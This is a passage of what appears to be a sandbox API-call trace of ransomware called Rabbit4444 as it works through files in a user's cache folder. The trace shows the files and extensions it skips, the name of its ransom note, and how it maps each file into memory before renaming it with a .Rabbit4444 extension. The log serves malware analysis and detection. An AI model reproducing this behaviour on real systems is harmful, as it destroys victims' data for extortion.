(lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.282] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.285] FlushFileBuffers (hFile=0x27c) returned 1 [0054.285] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.286] CloseHandle (hObject=0x27c) returned 1 [0054.286] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned 68 [0054.286] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.286] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbac9c0cb, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xe9ae7851, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0054.286] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.286] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.286] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.286] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.286] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbac9c0cb, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xe9ae7851, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.286] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.286] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.286] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.286] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.286] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.286] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9ae7851, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9ae7851, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9ae7851, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.286] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.287] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.287] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdfedb1f6, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd83c4863, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="Rabbit4444.exe") returned -1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".") returned 1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="..") returned 1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="windows") returned -1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="bootmgr") returned -1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="pagefile.sys") returned -1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="boot") returned -1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="ids.txt") returned -1 [0054.287] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="NTUSER.DAT") returned -1 [0054.287] lstrcpyW (in: lpString1=0x130ebc2, lpString2="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" | out: lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" [0054.287] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2020) returned 1 [0054.287] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2004) returned 1 [0054.287] lstrlenW (lpString="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 32 [0054.287] lstrlenW (lpString="Rabbit4444") returned 10 [0054.287] lstrcmpiW (lpString1="2B8CFD4157", lpString2="Rabbit4444") returned -1 [0054.287] lstrlenW (lpString=".dll") returned 4 [0054.287] lstrcmpiW (lpString1="4157", lpString2=".dll") returned 1 [0054.287] lstrlenW (lpString=".lnk") returned 4 [0054.287] lstrcmpiW (lpString1="4157", lpString2=".lnk") returned 1 [0054.287] lstrlenW (lpString=".ini") returned 4 [0054.288] lstrcmpiW (lpString1="4157", lpString2=".ini") returned 1 [0054.288] lstrlenW (lpString=".sys") returned 4 [0054.288] lstrcmpiW (lpString1="4157", lpString2=".sys") returned 1 [0054.288] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.288] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.288] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14559856495) returned 1 [0054.288] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=340) returned 1 [0054.288] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0054.288] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0054.288] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x298 [0054.289] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x70000 [0054.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0054.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0054.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0054.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0054.290] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14560045215) returned 1 [0054.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0054.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0054.290] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.290] CloseHandle (hObject=0x298) returned 1 [0054.290] CloseHandle (hObject=0x278) returned 1 [0054.291] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.Rabbit4444") returned 112 [0054.291] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157.rabbit4444"), dwFlags=0x1) returned 1 [0054.291] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xf750fa79, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xf750fa79, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xbabb727f, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", cAlternateFileName="6BADA8~1")) returned 1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="Rabbit4444.exe") returned -1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2=".") returned 1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="..") returned 1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="windows") returned -1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="bootmgr") returned -1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="pagefile.sys") returned -1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="boot") returned -1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="ids.txt") returned -1 [0054.291] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="NTUSER.DAT") returned -1 [0054.291] lstrcpyW (in: lpString1=0x130ebc2, lpString2="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4" | out: lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4") returned="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4" [0054.291] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", dwFileAttributes=0x2020) returned 1 [0054.297] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", dwFileAttributes=0x2004) returned 1 [0054.297] lstrlenW (lpString="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4") returned 65 [0054.297] lstrlenW (lpString="Rabbit4444") returned 10 [0054.297] lstrcmpiW (lpString1="E1FE18FCE4", lpString2="Rabbit4444") returned -1 [0054.297] lstrlenW (lpString=".dll") returned 4 [0054.297] lstrcmpiW (lpString1="FCE4", lpString2=".dll") returned 1 [0054.297] lstrlenW (lpString=".lnk") returned 4 [0054.297] lstrcmpiW (lpString1="FCE4", lpString2=".lnk") returned 1 [0054.297] lstrlenW (lpString=".ini") returned 4 [0054.297] lstrcmpiW (lpString1="FCE4", lpString2=".ini") returned 1 [0054.297] lstrlenW (lpString=".sys") returned 4 [0054.297] lstrcmpiW (lpString1="FCE4", lpString2=".sys") returned 1 [0054.297] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_88614ffad35d353421b8a7e1fe18fce4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.298] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.298] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14560836682) returned 1 [0054.298] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=434) returned 1 [0054.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0054.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0054.298] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c0, lpName=0x0) returned 0x298 [0054.299] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c0) returned 0x70000 [0054.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0054.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0054.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0054.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0054.301] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14561143426) returned 1 [0054.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0054.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0054.301] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.301] CloseHandle (hObject=0x298) returned 1 [0054.301] CloseHandle (hObject=0x278) returned 1 [0054.301] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4.Rabbit4444") returned 145 [0054.301] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_88614ffad35d353421b8a7e1fe18fce4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_88614ffad35d353421b8a7e1fe18fce4.rabbit4444"), dwFlags=0x1) returned 1 [0054.302] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5a26ac8b, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x5a26ac8b, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xbac038b2, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", cAlternateFileName="6BADA8~3")) returned 1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="Rabbit4444.exe") returned -1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2=".") returned 1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="..") returned 1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="windows") returned -1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="bootmgr") returned -1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="pagefile.sys") returned -1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="boot") returned -1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="ids.txt") returned -1 [0054.302] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="NTUSER.DAT") returned -1 [0054.302] lstrcpyW (in: lpString1=0x130ebc2, lpString2="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" | out: lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04") returned="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" [0054.302] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", dwFileAttributes=0x2020) returned 1 [0054.303] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", dwFileAttributes=0x2004) returned 1 [0054.303] lstrlenW (lpString="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04") returned 65 [0054.303] lstrlenW (lpString="Rabbit4444") returned 10 [0054.303] lstrcmpiW (lpString1="4792417E04", lpString2="Rabbit4444") returned -1 [0054.303] lstrlenW (lpString=".dll") returned 4 [0054.303] lstrcmpiW (lpString1="7E04", lpString2=".dll") returned 1 [0054.303] lstrlenW (lpString=".lnk") returned 4 [0054.303] lstrcmpiW (lpString1="7E04", lpString2=".lnk") returned 1 [0054.303] lstrlenW (lpString=".ini") returned 4 [0054.303] lstrcmpiW (lpString1="7E04", lpString2=".ini") returned 1 [0054.303] lstrlenW (lpString=".sys") returned 4 [0054.303] lstrcmpiW (lpString1="7E04", lpString2=".sys") returned 1 [0054.303] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.303] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.304] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14561428101) returned 1 [0054.304] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=434) returned 1 [0054.304] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0054.304] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0054.304] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c0, lpName=0x0) returned 0x298 [0054.305] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c0) returned 0x70000 [0054.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0054.306] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0054.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0054.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0054.307] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14561745748) returned 1 [0054.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0054.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0054.307] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.307] CloseHandle (hObject=0x298) returned 1 [0054.307] CloseHandle (hObject=0x278) returned 1 [0054.307] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.Rabbit4444") returned 145 [0054.307] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04.rabbit4444"), dwFlags=0x1) returned 1 [0054.308] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x59ed7426, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x59ed7426, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xbac038b2, ftLastWriteTime.dwHighDateTime=0x1d47c31, 